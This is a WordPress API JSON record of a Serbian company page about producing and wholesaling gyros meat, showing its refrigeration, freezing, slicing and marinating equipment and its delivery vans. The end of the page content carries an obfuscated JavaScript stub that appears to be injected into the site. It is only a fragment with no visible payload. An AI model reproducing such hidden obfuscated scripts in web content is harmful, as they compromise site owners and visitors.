{"id":215,"date":"2020-05-25T20:42:58","date_gmt":"2020-05-25T18:42:58","guid":{"rendered":"http:\/\/www.solunac.rs\/?page_id=215"},"modified":"2023-09-23T09:55:21","modified_gmt":"2023-09-23T07:55:21","slug":"proizvodnja-mesa","status":"publish","type":"page","link":"http:\/\/www.solunac.rs\/gb\/proizvodnja-mesa\/","title":{"rendered":"PROIZVODNJA I VELEPRODAJA POLUGOTOVOG PROIZVODA ZA GR\u010cKI GYROS"},"content":{"rendered":"<h2><strong>PROIZVODNJA POLUGOTOVOG PROIZVODA ZA GR\u010cKI GYROS PO HASAP STANDARDU<\/strong><\/h2>\n<h3 style=\"text-align: center;\">Hladnja\u010da za \u010duvanje mesa, odr\u017eava temperaturu 0-4\u00b0C, kapacitet 500 kg sve\u017eeg mesa<\/h3>\n<p><BR><br \/>\n\n\t\t<style type=\"text\/css\">\n\t\t\t#gallery-1 {\n\t\t\t\tmargin: auto;\n\t\t\t}\n\t\t\t#gallery-1 .gallery-item {\n\t\t\t\tfloat: left;\n\t\t\t\tmargin-top: 10px;\n\t\t\t\ttext-align: center;\n\t\t\t\twidth: 100%;\n\t\t\t}\n\t\t\t#gallery-1 img {\n\t\t\t\tborder: 2px solid #cfcfcf;\n\t\t\t}\n\t\t\t#gallery-1 .gallery-caption {\n\t\t\t\tmargin-left: 0;\n\t\t\t}\n\t\t\t\/* see gallery_shortcode() in wp-includes\/media.php *\/\n\t\t<\/style>\n\t\t<div id='gallery-1' class='gallery galleryid-215 gallery-columns-1 gallery-size-large'><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='http:\/\/www.solunac.rs\/gb\/proizvodnja-mesa\/komora1\/'><img width=\"1024\" height=\"683\" src=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/komora1-1024x683.jpg\" class=\"attachment-large size-large\" alt=\"\" loading=\"lazy\" srcset=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/komora1-1024x683.jpg 1024w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/komora1-300x200.jpg 300w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/komora1-768x512.jpg 768w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/komora1-1080x720.jpg 1080w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/komora1.jpg 1600w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a>\n\t\t\t<\/dt><\/dl><br style=\"clear: both\" \/>\n\t\t<\/div>\n<\/p>\n\n\t\t<style type=\"text\/css\">\n\t\t\t#gallery-2 {\n\t\t\t\tmargin: auto;\n\t\t\t}\n\t\t\t#gallery-2 .gallery-item {\n\t\t\t\tfloat: left;\n\t\t\t\tmargin-top: 10px;\n\t\t\t\ttext-align: center;\n\t\t\t\twidth: 50%;\n\t\t\t}\n\t\t\t#gallery-2 img {\n\t\t\t\tborder: 2px solid #cfcfcf;\n\t\t\t}\n\t\t\t#gallery-2 .gallery-caption {\n\t\t\t\tmargin-left: 0;\n\t\t\t}\n\t\t\t\/* see gallery_shortcode() in wp-includes\/media.php *\/\n\t\t<\/style>\n\t\t<div id='gallery-2' class='gallery galleryid-215 gallery-columns-2 gallery-size-large'><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon portrait'>\n\t\t\t\t<a href='http:\/\/www.solunac.rs\/gb\/proizvodnja-mesa\/komora2\/'><img width=\"682\" height=\"1024\" src=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/komora2-682x1024.jpg\" class=\"attachment-large size-large\" alt=\"\" loading=\"lazy\" srcset=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/komora2-682x1024.jpg 682w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/komora2-200x300.jpg 200w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/komora2.jpg 711w\" sizes=\"(max-width: 682px) 100vw, 682px\" \/><\/a>\n\t\t\t<\/dt><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon portrait'>\n\t\t\t\t<a href='http:\/\/www.solunac.rs\/gb\/proizvodnja-mesa\/komora4-2\/'><img width=\"682\" height=\"1024\" src=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/komora4-1-682x1024.jpg\" class=\"attachment-large size-large\" alt=\"\" loading=\"lazy\" srcset=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/komora4-1-682x1024.jpg 682w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/komora4-1-200x300.jpg 200w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/komora4-1.jpg 711w\" sizes=\"(max-width: 682px) 100vw, 682px\" \/><\/a>\n\t\t\t<\/dt><\/dl><br style=\"clear: both\" \/>\n\t\t<\/div>\n\n<h3 style=\"text-align: center;\">Komora za brzo zamrzavanje na -50c, kapaciteta 100 Kg\/45min &#8211; \u0160OK KOMORA<\/h3>\n\n\t\t<style type=\"text\/css\">\n\t\t\t#gallery-3 {\n\t\t\t\tmargin: auto;\n\t\t\t}\n\t\t\t#gallery-3 .gallery-item {\n\t\t\t\tfloat: left;\n\t\t\t\tmargin-top: 10px;\n\t\t\t\ttext-align: center;\n\t\t\t\twidth: 100%;\n\t\t\t}\n\t\t\t#gallery-3 img {\n\t\t\t\tborder: 2px solid #cfcfcf;\n\t\t\t}\n\t\t\t#gallery-3 .gallery-caption {\n\t\t\t\tmargin-left: 0;\n\t\t\t}\n\t\t\t\/* see gallery_shortcode() in wp-includes\/media.php *\/\n\t\t<\/style>\n\t\t<div id='gallery-3' class='gallery galleryid-215 gallery-columns-1 gallery-size-large'><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon portrait'>\n\t\t\t\t<a href='http:\/\/www.solunac.rs\/gb\/proizvodnja-mesa\/friz_solunac\/'><img width=\"682\" height=\"1024\" src=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2021\/04\/friz_solunac-682x1024.jpg\" class=\"attachment-large size-large\" alt=\"\" loading=\"lazy\" srcset=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2021\/04\/friz_solunac.jpg 682w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2021\/04\/friz_solunac-200x300.jpg 200w\" sizes=\"(max-width: 682px) 100vw, 682px\" \/><\/a>\n\t\t\t<\/dt><\/dl><br style=\"clear: both\" \/>\n\t\t<\/div>\n\n<h3 style=\"text-align: center;\">Komora za duboko smrzavanje na -18c, skladi\u0161nog kapaciteta od 2.500 Kg<\/h3>\n\n\t\t<style type=\"text\/css\">\n\t\t\t#gallery-4 {\n\t\t\t\tmargin: auto;\n\t\t\t}\n\t\t\t#gallery-4 .gallery-item {\n\t\t\t\tfloat: left;\n\t\t\t\tmargin-top: 10px;\n\t\t\t\ttext-align: center;\n\t\t\t\twidth: 100%;\n\t\t\t}\n\t\t\t#gallery-4 img {\n\t\t\t\tborder: 2px solid #cfcfcf;\n\t\t\t}\n\t\t\t#gallery-4 .gallery-caption {\n\t\t\t\tmargin-left: 0;\n\t\t\t}\n\t\t\t\/* see gallery_shortcode() in wp-includes\/media.php *\/\n\t\t<\/style>\n\t\t<div id='gallery-4' class='gallery galleryid-215 gallery-columns-1 gallery-size-large'><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon portrait'>\n\t\t\t\t<a href='http:\/\/www.solunac.rs\/gb\/meso2_solunac\/'><img width=\"682\" height=\"1024\" src=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2021\/04\/meso2_solunac-682x1024.jpg\" class=\"attachment-large size-large\" alt=\"\" loading=\"lazy\" srcset=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2021\/04\/meso2_solunac.jpg 682w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2021\/04\/meso2_solunac-200x300.jpg 200w\" sizes=\"(max-width: 682px) 100vw, 682px\" \/><\/a>\n\t\t\t<\/dt><\/dl><br style=\"clear: both\" \/>\n\t\t<\/div>\n\n\n\t\t<style type=\"text\/css\">\n\t\t\t#gallery-5 {\n\t\t\t\tmargin: auto;\n\t\t\t}\n\t\t\t#gallery-5 .gallery-item {\n\t\t\t\tfloat: left;\n\t\t\t\tmargin-top: 10px;\n\t\t\t\ttext-align: center;\n\t\t\t\twidth: 50%;\n\t\t\t}\n\t\t\t#gallery-5 img {\n\t\t\t\tborder: 2px solid #cfcfcf;\n\t\t\t}\n\t\t\t#gallery-5 .gallery-caption {\n\t\t\t\tmargin-left: 0;\n\t\t\t}\n\t\t\t\/* see gallery_shortcode() in wp-includes\/media.php *\/\n\t\t<\/style>\n\t\t<div id='gallery-5' class='gallery galleryid-215 gallery-columns-2 gallery-size-large'><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='http:\/\/www.solunac.rs\/gb\/meso_solunac\/'><img width=\"1024\" height=\"683\" src=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2021\/04\/meso_solunac-1024x683.jpg\" class=\"attachment-large size-large\" alt=\"\" loading=\"lazy\" srcset=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2021\/04\/meso_solunac.jpg 1024w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2021\/04\/meso_solunac-300x200.jpg 300w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2021\/04\/meso_solunac-768x512.jpg 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a>\n\t\t\t<\/dt><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='http:\/\/www.solunac.rs\/gb\/meso1_solunac\/'><img width=\"1024\" height=\"683\" src=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2021\/04\/meso1_solunac-1024x683.jpg\" class=\"attachment-large size-large\" alt=\"\" loading=\"lazy\" srcset=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2021\/04\/meso1_solunac.jpg 1024w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2021\/04\/meso1_solunac-300x200.jpg 300w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2021\/04\/meso1_solunac-768x512.jpg 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a>\n\t\t\t<\/dt><\/dl><br style=\"clear: both\" \/>\n\t\t<\/div>\n\n<h3 style=\"text-align: center;\">Ma\u0161ina za seckanje svinjskog mesa za giros (se?e na debljinu od 3 mm)<\/h3>\n\n\t\t<style type=\"text\/css\">\n\t\t\t#gallery-6 {\n\t\t\t\tmargin: auto;\n\t\t\t}\n\t\t\t#gallery-6 .gallery-item {\n\t\t\t\tfloat: left;\n\t\t\t\tmargin-top: 10px;\n\t\t\t\ttext-align: center;\n\t\t\t\twidth: 50%;\n\t\t\t}\n\t\t\t#gallery-6 img {\n\t\t\t\tborder: 2px solid #cfcfcf;\n\t\t\t}\n\t\t\t#gallery-6 .gallery-caption {\n\t\t\t\tmargin-left: 0;\n\t\t\t}\n\t\t\t\/* see gallery_shortcode() in wp-includes\/media.php *\/\n\t\t<\/style>\n\t\t<div id='gallery-6' class='gallery galleryid-215 gallery-columns-2 gallery-size-large'><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon portrait'>\n\t\t\t\t<a href='http:\/\/www.solunac.rs\/gb\/proizvodnja-mesa\/seckaloca2\/'><img width=\"682\" height=\"1024\" src=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/seckaloca2-682x1024.jpg\" class=\"attachment-large size-large\" alt=\"\" loading=\"lazy\" srcset=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/seckaloca2-682x1024.jpg 682w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/seckaloca2-200x300.jpg 200w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/seckaloca2.jpg 711w\" sizes=\"(max-width: 682px) 100vw, 682px\" \/><\/a>\n\t\t\t<\/dt><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon portrait'>\n\t\t\t\t<a href='http:\/\/www.solunac.rs\/gb\/proizvodnja-mesa\/seckalica1\/'><img width=\"682\" height=\"1024\" src=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/seckalica1-682x1024.jpg\" class=\"attachment-large size-large\" alt=\"\" loading=\"lazy\" srcset=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/seckalica1-682x1024.jpg 682w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/seckalica1-200x300.jpg 200w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/seckalica1.jpg 711w\" sizes=\"(max-width: 682px) 100vw, 682px\" \/><\/a>\n\t\t\t<\/dt><\/dl><br style=\"clear: both\" \/>\n\t\t<\/div>\n\n<h3>Tanbler sa hladnjakom za mariniranje mesa za gr\u010dki giros kapaciteta 250 kg<\/h3>\n\n\t\t<style type=\"text\/css\">\n\t\t\t#gallery-7 {\n\t\t\t\tmargin: auto;\n\t\t\t}\n\t\t\t#gallery-7 .gallery-item {\n\t\t\t\tfloat: left;\n\t\t\t\tmargin-top: 10px;\n\t\t\t\ttext-align: center;\n\t\t\t\twidth: 33%;\n\t\t\t}\n\t\t\t#gallery-7 img {\n\t\t\t\tborder: 2px solid #cfcfcf;\n\t\t\t}\n\t\t\t#gallery-7 .gallery-caption {\n\t\t\t\tmargin-left: 0;\n\t\t\t}\n\t\t\t\/* see gallery_shortcode() in wp-includes\/media.php *\/\n\t\t<\/style>\n\t\t<div id='gallery-7' class='gallery galleryid-215 gallery-columns-3 gallery-size-large'><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='http:\/\/www.solunac.rs\/gb\/proizvodnja-mesa\/mesalica1-840x560\/'><img width=\"840\" height=\"560\" src=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2021\/11\/mesalica1-840x560.jpg\" class=\"attachment-large size-large\" alt=\"\" loading=\"lazy\" srcset=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2021\/11\/mesalica1-840x560.jpg 840w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2021\/11\/mesalica1-840x560-300x200.jpg 300w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2021\/11\/mesalica1-840x560-768x512.jpg 768w\" sizes=\"(max-width: 840px) 100vw, 840px\" \/><\/a>\n\t\t\t<\/dt><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='http:\/\/www.solunac.rs\/gb\/proizvodnja-mesa\/mesalica2-840x560\/'><img width=\"840\" height=\"560\" src=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2021\/11\/mesalica2-840x560.jpg\" class=\"attachment-large size-large\" alt=\"\" loading=\"lazy\" srcset=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2021\/11\/mesalica2-840x560.jpg 840w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2021\/11\/mesalica2-840x560-300x200.jpg 300w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2021\/11\/mesalica2-840x560-768x512.jpg 768w\" sizes=\"(max-width: 840px) 100vw, 840px\" \/><\/a>\n\t\t\t<\/dt><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='http:\/\/www.solunac.rs\/gb\/proizvodnja-mesa\/mesalica3-840x560\/'><img width=\"840\" height=\"560\" src=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2021\/11\/mesalica3-840x560.jpg\" class=\"attachment-large size-large\" alt=\"\" loading=\"lazy\" srcset=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2021\/11\/mesalica3-840x560.jpg 840w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2021\/11\/mesalica3-840x560-300x200.jpg 300w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2021\/11\/mesalica3-840x560-768x512.jpg 768w\" sizes=\"(max-width: 840px) 100vw, 840px\" \/><\/a>\n\t\t\t<\/dt><\/dl><br style=\"clear: both\" \/>\n\t\t<\/div>\n\n<h3 style=\"text-align: center;\">Slaganje mesa na \u0161tap<\/h3>\n\n\t\t<style type=\"text\/css\">\n\t\t\t#gallery-8 {\n\t\t\t\tmargin: auto;\n\t\t\t}\n\t\t\t#gallery-8 .gallery-item {\n\t\t\t\tfloat: left;\n\t\t\t\tmargin-top: 10px;\n\t\t\t\ttext-align: center;\n\t\t\t\twidth: 50%;\n\t\t\t}\n\t\t\t#gallery-8 img {\n\t\t\t\tborder: 2px solid #cfcfcf;\n\t\t\t}\n\t\t\t#gallery-8 .gallery-caption {\n\t\t\t\tmargin-left: 0;\n\t\t\t}\n\t\t\t\/* see gallery_shortcode() in wp-includes\/media.php *\/\n\t\t<\/style>\n\t\t<div id='gallery-8' class='gallery galleryid-215 gallery-columns-2 gallery-size-large'><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='http:\/\/www.solunac.rs\/gb\/proizvodnja-mesa\/slaganje_girosa4\/'><img width=\"1024\" height=\"683\" src=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/slaganje_girosa4-1024x683.jpg\" class=\"attachment-large size-large\" alt=\"\" loading=\"lazy\" srcset=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/slaganje_girosa4-1024x683.jpg 1024w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/slaganje_girosa4-300x200.jpg 300w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/slaganje_girosa4-768x512.jpg 768w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/slaganje_girosa4-1080x720.jpg 1080w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/slaganje_girosa4.jpg 1600w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a>\n\t\t\t<\/dt><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='http:\/\/www.solunac.rs\/gb\/proizvodnja-mesa\/slaganje_girosa2\/'><img width=\"1024\" height=\"683\" src=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/slaganje_girosa2-1024x683.jpg\" class=\"attachment-large size-large\" alt=\"\" loading=\"lazy\" srcset=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/slaganje_girosa2-1024x683.jpg 1024w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/slaganje_girosa2-300x200.jpg 300w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/slaganje_girosa2-768x512.jpg 768w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/slaganje_girosa2-1080x720.jpg 1080w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/slaganje_girosa2.jpg 1600w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a>\n\t\t\t<\/dt><\/dl><br style=\"clear: both\" \/><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon portrait'>\n\t\t\t\t<a href='http:\/\/www.solunac.rs\/gb\/proizvodnja-mesa\/slaganje_girosa1\/'><img width=\"682\" height=\"1024\" src=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/slaganje_girosa1-682x1024.jpg\" class=\"attachment-large size-large\" alt=\"\" loading=\"lazy\" srcset=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/slaganje_girosa1-682x1024.jpg 682w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/slaganje_girosa1-200x300.jpg 200w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/slaganje_girosa1.jpg 711w\" sizes=\"(max-width: 682px) 100vw, 682px\" \/><\/a>\n\t\t\t<\/dt><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon portrait'>\n\t\t\t\t<a href='http:\/\/www.solunac.rs\/gb\/proizvodnja-mesa\/slaganje_girosa3\/'><img width=\"682\" height=\"1024\" src=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/slaganje_girosa3-682x1024.jpg\" class=\"attachment-large size-large\" alt=\"\" loading=\"lazy\" srcset=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/slaganje_girosa3-682x1024.jpg 682w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/slaganje_girosa3-200x300.jpg 200w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/05\/slaganje_girosa3.jpg 711w\" sizes=\"(max-width: 682px) 100vw, 682px\" \/><\/a>\n\t\t\t<\/dt><\/dl><br style=\"clear: both\" \/>\n\t\t<\/div>\n\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td colspan=\"2\" align=\"center\" valign=\"top\" width=\"50%\">\n<h3 style=\"text-align: center;\">Pile\u0107i giros (pripremljno za pe\u010denje)<br \/>\nod 20 do 50 kg<br \/>\n<strong><span style=\"color: #ff0000;\">POZVATI ZA CENU<\/span><\/strong><\/h3>\n<\/td>\n<td align=\"center\" valign=\"top\" width=\"50%\">\n<h3 style=\"text-align: center;\">Svinjski giros (pripremljno za pe\u010denje)<br \/>\nod 20 do 50 kg<br \/>\n<strong><span style=\"color: #ff0000;\">POZVATI ZA CENU<\/span><\/strong><\/h3>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3 style=\"text-align: center;\">Obezbe?ujemo prevoz hladnja\u010dama za na\u0161e partnere<\/h3>\n\n\t\t<style type=\"text\/css\">\n\t\t\t#gallery-9 {\n\t\t\t\tmargin: auto;\n\t\t\t}\n\t\t\t#gallery-9 .gallery-item {\n\t\t\t\tfloat: left;\n\t\t\t\tmargin-top: 10px;\n\t\t\t\ttext-align: center;\n\t\t\t\twidth: 50%;\n\t\t\t}\n\t\t\t#gallery-9 img {\n\t\t\t\tborder: 2px solid #cfcfcf;\n\t\t\t}\n\t\t\t#gallery-9 .gallery-caption {\n\t\t\t\tmargin-left: 0;\n\t\t\t}\n\t\t\t\/* see gallery_shortcode() in wp-includes\/media.php *\/\n\t\t<\/style>\n\t\t<div id='gallery-9' class='gallery galleryid-215 gallery-columns-2 gallery-size-large'><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='http:\/\/www.solunac.rs\/gb\/pikap_solunac\/'><img width=\"1024\" height=\"683\" src=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2021\/04\/pikap_solunac-1024x683.jpg\" class=\"attachment-large size-large\" alt=\"\" loading=\"lazy\" srcset=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2021\/04\/pikap_solunac.jpg 1024w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2021\/04\/pikap_solunac-300x200.jpg 300w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2021\/04\/pikap_solunac-768x512.jpg 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a>\n\t\t\t<\/dt><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='http:\/\/www.solunac.rs\/gb\/kombi_solunac\/'><img width=\"1024\" height=\"683\" src=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2021\/04\/kombi_solunac-1024x683.jpg\" class=\"attachment-large size-large\" alt=\"\" loading=\"lazy\" srcset=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2021\/04\/kombi_solunac.jpg 1024w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2021\/04\/kombi_solunac-300x200.jpg 300w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2021\/04\/kombi_solunac-768x512.jpg 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a>\n\t\t\t<\/dt><\/dl><br style=\"clear: both\" \/><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon portrait'>\n\t\t\t\t<a href='http:\/\/www.solunac.rs\/gb\/proizvodnja-mesa\/kombi4\/'><img width=\"576\" height=\"1024\" src=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2021\/06\/kombi4-576x1024.jpg\" class=\"attachment-large size-large\" alt=\"\" loading=\"lazy\" srcset=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2021\/06\/kombi4-576x1024.jpg 576w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2021\/06\/kombi4-169x300.jpg 169w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2021\/06\/kombi4-768x1365.jpg 768w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2021\/06\/kombi4.jpg 900w\" sizes=\"(max-width: 576px) 100vw, 576px\" \/><\/a>\n\t\t\t<\/dt><\/dl>\n\t\t\t<br style='clear: both' \/>\n\t\t<\/div>\n\n<p><script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>PROIZVODNJA POLUGOTOVOG PROIZVODA ZA GR\u010cKI GYROS PO HASAP STANDARDU Hladnja\u010da za \u010duvanje mesa, odr\u017eava temperaturu 0-4\u00b0C, kapacitet 500 kg sve\u017eeg mesa Komora za brzo zamrzavanje na -50c, kapaciteta 100 Kg\/45min &#8211; \u0160OK KOMORA Komora za duboko smrzavanje na -18c, skladi\u0161nog kapaciteta od 2.500 Kg Ma\u0161ina za seckanje svinjskog mesa za giros (se?e na debljinu od [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/www.solunac.rs\/gb\/wp-json\/wp\/v2\/pages\/215"}],"collection":[{"href":"http:\/\/www.solunac.rs\/gb\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/www.solunac.rs\/gb\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/www.solunac.rs\/gb\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.solunac.rs\/gb\/wp-json\/wp\/v2\/comments?post=215"}],"version-history":[{"count":36,"href":"http:\/\/www.solunac.rs\/gb\/wp-json\/wp\/v2\/pages\/215\/revisions"}],"predecessor-version":[{"id":492,"href":"http:\/\/www.solunac.rs\/gb\/wp-json\/wp\/v2\/pages\/215\/revisions\/492"}],"wp:attachment":[{"href":"http:\/\/www.solunac.rs\/gb\/wp-json\/wp\/v2\/media?parent=215"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}